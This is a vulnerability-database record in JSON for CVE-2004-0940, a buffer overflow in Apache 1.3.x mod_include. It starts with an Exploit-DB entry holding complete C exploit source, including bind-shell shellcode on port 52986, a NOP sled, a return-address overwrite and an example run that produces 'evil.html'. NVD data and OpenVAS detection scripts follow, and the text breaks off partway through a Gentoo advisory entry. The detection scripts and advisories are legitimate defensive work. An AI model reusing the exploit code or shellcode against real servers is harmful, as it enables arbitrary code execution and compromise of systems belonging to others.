{"id": "EDB-ID:24694", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Apache 1.3.x mod_include Local Buffer Overflow Vulnerability", "description": "Apache 1.3.x mod_include Local Buffer Overflow Vulnerability. CVE-2004-0940. Local exploit for linux platform", "published": "2004-10-18T00:00:00", "modified": "2004-10-18T00:00:00", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/24694/", "reporter": "xCrZx", "references": [], "cvelist": ["CVE-2004-0940"], "lastseen": "2016-02-02T23:49:49", "viewCount": 2, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-02T23:49:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0940"]}, {"type": "openvas", "idList": ["OPENVAS:53282", "OPENVAS:65132", "OPENVAS:136141256231015554", "OPENVAS:136141256231065132", "OPENVAS:52314", "OPENVAS:136141256231053902", "OPENVAS:53902", "OPENVAS:54724", "OPENVAS:15554"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2004-305-01.NASL", "GENTOO_GLSA-200411-03.NASL", "FREEBSD_PKG_6E6A6B8A2FDE11D9B3A20050FC56D258.NASL", "APACHE_MOD_INCLUDE_PRIV_ESCALATION.NASL", "FREEBSD_APACHE_1333_MOD_INCLUDE.NASL", "REDHAT-RHSA-2004-600.NASL", "MANDRAKE_MDKSA-2004-134.NASL", "DEBIAN_DSA-594.NASL", "MACOSX_SECUPD20041202.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-594-1:FDA26"]}, {"type": "freebsd", "idList": ["6E6A6B8A-2FDE-11D9-B3A2-0050FC56D258"]}, {"type": "exploitdb", "idList": ["EDB-ID:587"]}, {"type": "httpd", "idList": ["HTTPD:D1741B6A255EEEFE57FCBB18F638BF8D", "HTTPD:88FE130D4F7C240484D2151167EA668E"]}, {"type": "osvdb", "idList": ["OSVDB:11003"]}, {"type": "gentoo", "idList": ["GLSA-200411-03"]}, {"type": "f5", "idList": ["F5:K4207"]}, {"type": "slackware", "idList": ["SSA-2004-305-01"]}, {"type": "suse", "idList": ["SUSE-SA:2004:041", "SUSE-SA:2004:040"]}, {"type": "redhat", "idList": ["RHSA-2004:600"]}], "modified": "2016-02-02T23:49:49", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/24694/", "sourceData": "source: http://www.securityfocus.com/bid/11471/info\r\n\r\nThe problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. \r\n\r\nA local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.\r\n\r\n/*********************************************************************************\r\n local exploit for mod_include of apache 1.3.x *\r\n written by xCrZx /18.10.2004/ *\r\n bug found by xCrZx /18.10.2004/ *\r\n *\r\n y0das old shao lin techniq ownz u :) remember my words *\r\n http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *\r\n *\r\n Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *\r\n*********************************************************************************/\r\n \r\n/*********************************************************************************\r\n Technical Details: *\r\n *\r\n there is an overflow in get_tag function: *\r\n *\r\nstatic char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *\r\n{ *\r\n... *\r\n term = c; *\r\n while (1) { *\r\n GET_CHAR(in, c, NULL, p); *\r\n[1] if (t - tag == tagbuf_len) { *\r\n *t = '\\0'; *\r\n return NULL; *\r\n } *\r\n// Want to accept \\\" as a valid character within a string. // *\r\n if (c == '\\\\') { *\r\n[2] *(t++) = c; // Add backslash // *\r\n GET_CHAR(in, c, NULL, p); *\r\n if (c == term) { // Only if // *\r\n[3] *(--t) = c; // Replace backslash ONLY for terminator // *\r\n } *\r\n } *\r\n else if (c == term) { *\r\n break; *\r\n } *\r\n[4] *(t++) = c; *\r\n } *\r\n *t = '\\0'; *\r\n... *\r\n *\r\nas we can see there is a [1] check to determine the end of tag buffer *\r\nbut this check can be skiped when [2] & [4] conditions will be occured *\r\nat the same time without [3] condition. *\r\n *\r\nSo attacker can create malicious file to overflow static buffer, on *\r\nwhich tag points out and execute arbitrary code with privilegies of *\r\nhttpd child process. *\r\n *\r\nFix: *\r\n[1*] if (t - tag >= tagbuf_len-1) { *\r\n *\r\nNotes: To activate mod_include you need write \"XBitHack on\" in httpd.conf *\r\n *\r\n*********************************************************************************/\r\n \r\n/*********************************************************************************\r\n Example of work: *\r\n *\r\n [root@blacksand htdocs]# make 85mod_include *\r\n cc 85mod_include.c -o 85mod_include *\r\n [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html *\r\n [root@blacksand htdocs]# chmod +x evil.html *\r\n [root@blacksand htdocs]# netstat -na|grep 52986 *\r\n [root@blacksand htdocs]# telnet localhost 8080 *\r\n Trying 127.0.0.1... *\r\n Connected to localhost. *\r\n Escape character is '^]'. *\r\n GET /evil.html HTTP/1.0 *\r\n ^] *\r\n telnet> q *\r\n Connection closed. *\r\n [root@blacksand htdocs]# netstat -na|grep 52986 *\r\n tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN *\r\n [root@blacksand htdocs]# *\r\n*********************************************************************************/\r\n \r\n/*********************************************************************************\r\n Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always *\r\n*********************************************************************************/\r\n \r\n/*********************************************************************************\r\n Personal hello to my parents :) *\r\n*********************************************************************************/\r\n \r\n/*********************************************************************************\r\n Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz *\r\n*********************************************************************************/\r\n \r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n \r\n#define EVILBUF 8202\r\n#define HTMLTEXT 1000\r\n \r\n#define HTML_FORMAT \"<html>\\n<!--#echo done=\\\"%s\\\" -->\\nxCrZx 0wn U\\n</\r\nhtml>\"\r\n \r\n#define AUTHOR \"\\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\\n\"\r\n\r\n \r\nint main(int argc, char **argv) {\r\n \r\n\tchar html[EVILBUF+HTMLTEXT];\r\n\tchar evilbuf[EVILBUF+1];\r\n \r\n\t//can be changed\r\n\tchar shellcode[] =\r\n \r\n // bind shell on 52986 port \r\n \"\\x31\\xc0\"\r\n \"\\x31\\xdb\\x53\\x43\\x53\\x89\\xd8\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x43\"\r\n \"\\x66\\xc7\\x44\\x24\\x02\\xce\\xfa\\xd1\\x6c\\x24\\x04\\x6a\\x10\\x51\\x50\\x89\"\r\n \"\\xe1\\xb0\\x66\\xcd\\x80\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x61\\x08\\xb0\"\r\n \"\\x66\\xcd\\x80\\x93\\x31\\xc9\\xb1\\x03\\x49\\xb0\\x3f\\xcd\\x80\\x75\\xf9\\x68\"\r\n \"\\x2f\\x73\\x68\\x20\\x68\\x2f\\x62\\x69\\x6e\\x88\\x4c\\x24\\x07\\x89\\xe3\\x51\"\r\n \"\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n \r\n //execve /tmp/sh <- your own program\r\n /*\r\n \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"\r\n \"\\xb0\\x2e\\xcd\\x80\\xeb\\x15\\x5b\\x31\"\r\n \"\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\"\r\n \"\\x43\\x0c\\x8d\\x4b\\x08\\x31\\xd2\\xb0\"\r\n \"\\x0b\\xcd\\x80\\xe8\\xe6\\xff\\xff\\xff\"\r\n \"/tmp/sh\";\r\n */\r\n \r\n \r\n\tchar NOP[] = \"\\x90\\x40\"; // special nops ;)\r\n\tchar evilpad[] = \"\\\\CRZCRZCRZCRZC\"; // trick ;)\r\n \r\n\tint padding,xpad=0;\r\n\tint i,fd;\r\n\tlong ret=0xbfff8688;\r\n \r\n\tif(argc>1) ret=strtoul(argv[1],0,16);\r\n\telse { fprintf(stderr,AUTHOR\"\\nUsage: %s <RET ADDR> > file.html\\n\\n\",argv[0]);exi\r\nt(0); }\r\n \r\n\tpadding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);\r\n \r\n\twhile(1) {\r\n\t\tif(padding%2==0) { padding/=2; break;}\r\n\t\telse {padding--;xpad++;}\r\n\t}\r\n \r\n\tmemset(html,0x0,sizeof html);\r\n\tmemset(evilbuf,0x0,sizeof evilbuf);\r\n \r\n\tfor(i=0;i<padding;i++)\r\n\t\tmemcpy(evilbuf+strlen(evilbuf),&NOP,2);\r\n\tfor(i=0;i<xpad;i++)\r\n\t\tmemcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);\r\n\r\n \r\n\tmemcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);\r\n\tmemcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);\r\n\t*(long*)&evilbuf[strlen(evilbuf)]=ret;\r\n \r\n\tsprintf(html,HTML_FORMAT,evilbuf);\r\n \r\n\tprintf(\"%s\",html);\r\n \r\n\treturn 0;\r\n}", "osvdbidlist": ["12881"]}

{"cve": [{"lastseen": "2020-10-03T11:33:39", "description": "Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.", "edition": 3, "cvss3": {}, "published": "2005-02-09T05:00:00", "title": "CVE-2004-0940", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0940"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/o:hp:hp-ux:11.11", "cpe:/a:apache:http_server:1.3.27", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:1.3.24", "cpe:/a:apache:http_server:1.3.22", "cpe:/o:hp:hp-ux:11.20", "cpe:/a:apache:http_server:1.3.17", "cpe:/o:hp:hp-ux:11.22", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/a:openpkg:openpkg:current", "cpe:/a:openpkg:openpkg:2.0", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:suse:suse_linux:9.1", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:1.3.14", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/a:openpkg:openpkg:2.1", "cpe:/a:apache:http_server:1.3.1", "cpe:/a:apache:http_server:1.3.20", "cpe:/o:suse:suse_linux:8.1", "cpe:/a:apache:http_server:1.3.19", "cpe:/a:apache:http_server:1.3.25", "cpe:/o:suse:suse_linux:8.2", "cpe:/o:hp:hp-ux:11.00", "cpe:/o:slackware:slackware_linux:current", "cpe:/a:apache:http_server:1.3.4", "cpe:/o:suse:suse_linux:9.2", "cpe:/a:apache:http_server:1.3.12", "cpe:/a:openpkg:openpkg:2.2", "cpe:/a:apache:http_server:1.3.7", "cpe:/o:trustix:secure_linux:1.5", "cpe:/o:slackware:slackware_linux:8.0", "cpe:/a:apache:http_server:1.3.26", "cpe:/a:apache:http_server:1.3", "cpe:/a:apache:http_server:1.3.11", "cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:1.3.32", "cpe:/o:suse:suse_linux:8.0", "cpe:/a:apache:http_server:1.3.18", "cpe:/a:apache:http_server:1.3.23", "cpe:/a:apache:http_server:1.3.29", "cpe:/o:suse:suse_linux:9.0", "cpe:/a:apache:http_server:1.3.9"], "id": "CVE-2004-0940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0940", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.22:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:current:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.24:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.26:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.17:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:dev:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:current:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote web server appears to be running a version of Apache that is older\n than version 1.3.33.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231015554", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231015554", "type": "openvas", "title": "Apache mod_include privilege escalation", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache mod_include privilege escalation\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n# Ref: Crazy Einstein\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.15554\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apache mod_include privilege escalation\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2004 David Maciejak\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_tag(name:\"summary\", value:\"The remote web server appears to be running a version of Apache that is older\n than version 1.3.33.\");\n\n script_tag(name:\"insight\", value:\"This version is vulnerable to a local buffer overflow in the get_tag()\n function of the module 'mod_include' when a specially crafted document\n with malformed server-side includes is requested though an HTTP session.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation can lead to execution of arbitrary code with\n escalated privileges, but requires that server-side includes (SSI) is enabled.\");\n\n script_tag(name:\"solution\", value:\"Disable SSI or upgrade to a newer version when available.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port( default:80 );\nbanner = http_get_remote_headers( port:port );\nif( ! banner ) exit( 0 );\n\nserv = strstr( banner, \"Server\" );\nif( ereg( pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-08T11:44:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote web server appears to be running a version of Apache that is older\nthan version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document \nwith malformed server-side includes is requested though an HTTP session.\n\nSuccessful exploitation can lead to execution of arbitrary code with \nescalated privileges, but requires that server-side includes (SSI) is enabled.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:15554", "href": "http://plugins.openvas.org/nasl.php?oid=15554", "type": "openvas", "title": "Apache mod_include privilege escalation", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_mod_include_priv_escalation.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Apache mod_include privilege escalation\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote web server appears to be running a version of Apache that is older\nthan version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document \nwith malformed server-side includes is requested though an HTTP session.\n\nSuccessful exploitation can lead to execution of arbitrary code with \nescalated privileges, but requires that server-side includes (SSI) is enabled.\";\n\ntag_solution = \"Disable SSI or upgrade to a newer version when available.\";\n\n# Ref: Crazy Einstein\n\nif(description)\n{\n script_id(15554);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n name = \"Apache mod_include privilege escalation\";\n\n script_name(name);\n\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n script_family(\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"http_func.inc\");\ninclude(\"global_settings.inc\");\n\nport = get_http_port(default:80);\nif(!port)exit(0);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port: port);\nif(!banner)exit(0);\n\nserv = strstr(banner, \"Server\");\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv))\n {\n security_message(port);\n exit(0);\n }\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing an update to apache\nannounced via advisory DSA 594-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53282", "href": "http://plugins.openvas.org/nasl.php?oid=53282", "type": "openvas", "title": "Debian Security Advisory DSA 594-1 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_594_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 594-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been identified in the Apache 1.3 webserver:\n\nCVE-2004-0940\n\nCrazy Einstein has discovered a vulnerability in the\nmod_include module, which can cause a buffer to be overflown and\ncould lead to the execution of arbitrary code.\n\nNO VULN ID\n\nLarry Cashdollar has discovered a potential buffer overflow in the\nhtpasswd utility, which could be exploited when user-supplied is\npassed to the program via a CGI (or PHP, or ePerl, ...) program.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.3.33-2.\n\nWe recommend that you upgrade your apache packages.\";\ntag_summary = \"The remote host is missing an update to apache\nannounced via advisory DSA 594-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20594-1\";\n\nif(description)\n{\n script_id(53282);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 594-1 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache-doc\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-common\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-dev\", ver:\"1.3.26-0woody6\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200411-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54724", "href": "http://plugins.openvas.org/nasl.php?oid=54724", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200411-03 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability exists in mod_include which could possibly\nallow a local attacker to gain escalated privileges.\";\ntag_solution = \"All Apache users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/apache-1.3.32-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200411-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=68564\nhttp://www.apacheweek.com/features/security-13\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200411-03.\";\n\n \n\nif(description)\n{\n script_id(54724);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200411-03 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 